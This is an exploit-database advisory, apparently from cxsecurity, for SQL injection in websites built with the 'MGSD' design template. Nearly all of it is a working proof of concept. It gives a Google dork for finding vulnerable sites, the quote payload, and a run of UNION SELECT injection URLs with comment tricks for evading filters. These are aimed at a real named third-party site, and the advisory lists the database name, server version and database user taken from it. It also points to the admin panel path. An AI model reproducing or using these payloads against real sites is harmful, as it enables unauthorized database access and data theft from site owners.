Conception et réalisation MGSD Sql injection Vulnerability

2019.04.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

======================================================================== # Title : Conception et réalisation MGSD Sql injection Vulnerability # Author : Dje3Bb4rAn0n (bassem) Fb.com/djebbar.bassem.16 # Date : 01/04/2019 # Tested on : Linux (Backbox) # Vendor : http://mgsd-dz.com/ ======================================================================== POC : [ + ] Admin panel path : [Your Domian]/admin/ [ + ] Search in google using this dork : ".php?id" intext:"Conception et réalisation MGSD" [ + ] Payload : ' [ + ] Fixable : ' --+ ############ EXAMPLE ################## ---------- columns num is 6 : ---------- http://dynamicfountain.com/page-products.php?id=30%27+order+by+6%20--+ ############################################ ---------- Vunl column is : 2 , 3 ,4 ---------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6%20--+ ############################################ --------- Database : dynamicf_bdd --------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,database(),3,4,5,6%20--+ ############################################# --------- Version : 10.1.38-MariaDB-cll-lve --------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,version(),3,4,5,6%20--+ ############################################# -------- User : dynamicf_newuser@localhost -------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,6%20--+ ############################################# ###### ----------------------------------------------------------- Greetz to : Lakarha_23 | mohammed pazzo | Ja gar ------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top